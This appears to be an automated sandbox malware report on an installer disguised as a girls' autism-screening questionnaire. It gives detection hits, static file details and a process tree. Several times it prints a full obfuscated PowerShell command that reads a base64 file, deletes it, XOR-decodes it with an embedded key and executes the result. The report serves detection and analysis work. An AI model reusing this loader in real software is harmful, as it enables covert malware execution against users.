            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt 
$25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, ParentProcessId: 2880, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8
Sigma detected: T1086 PowerShell Execution
Source: Pipe created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: PipeName: \PSHost.132837360327648466.5516.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell Decrypt And Execute Base64 Data
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt 
$25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, ParentProcessId: 2880, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            Multi AV Scanner detection for submitted file
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, Virustotal: Detection: 35%
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, Metadefender: Detection: 20%
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, ReversingLabs: Detection: 35%
            Antivirus / Scanner detection for submitted sample
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, Avira: detected
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000003.383501871.00000000038C0000.00000004.00000001.sdmp
            Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000003.388759087.0000000007351000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000003.394460338.00000000038C4000.00000004.00000001.sdmp
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, Code function: 0_2_0040AEF4 FindFirstFileW,FindClose,0_2_0040AEF4
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, Code function: 0_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_0040A928
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, Code function: 3_2_0060C2B0 FindFirstFileW,GetLastError,3_2_0060C2B0
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, Code function: 3_2_0040E6A0 FindFirstFileW,FindClose,3_2_0040E6A0
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, Code function: 3_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,3_2_0040E0D4
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, Code function: 3_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,3_2_006B8DE4

            Spam, unwanted Advertisements and Ransom Demands:

            Writes many files with high entropy

            System Summary:

            Initial sample is a PE file and has a suspicious name
            Source: initial sample, Static PE information: Filename: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, Code function: 0_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_004AF110
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, Code function: 3_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_2_0060F6D8
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Code function: String function: 005F5C7C appears 50 times
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Code function: String function: 005F5F60 appears 62 times
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Code function: String function: 005DE888 appears 40 times
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.342303509.00000000022E8000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamekernel32j% vs Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000000.281569295.00000000004C6000.00000002.00020000.sdmp Binary or memory string: OriginalFileName vs Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282256431.0000000002520000.00000004.00000001.sdmp Binary or memory string: OriginalFileName vs Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282523000.000000007FB50000.00000004.00000001.sdmp Binary or memory string: OriginalFileName vs Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Binary or memory string: OriginalFileName vs Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Static PE information: invalid certificate
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Virustotal: Detection: 35%
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Metadefender: Detection: 20%
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe ReversingLabs: Detection: 35%
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe File read: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown Process created: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe "C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe"
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Process created: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer /prefetch:1 "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=18138760929948388568 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=18138760929948388568 --renderer-client-id=2 --mojo-platform-channel-handle=1708 --allow-no-sandbox-job /prefetch:1
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=1964537546466602417 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=8469343885171470224 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=8469343885171470224 --renderer-client-id=4 --mojo-platform-channel-handle=1800 --allow-no-sandbox-job /prefetch:1
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=3770922529545536729 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=3770922529545536729 --renderer-client-id=5 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job /prefetch:1
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=15315623175826486505 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15315623175826486505 --renderer-client-id=6 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job /prefetch:1
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdfJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
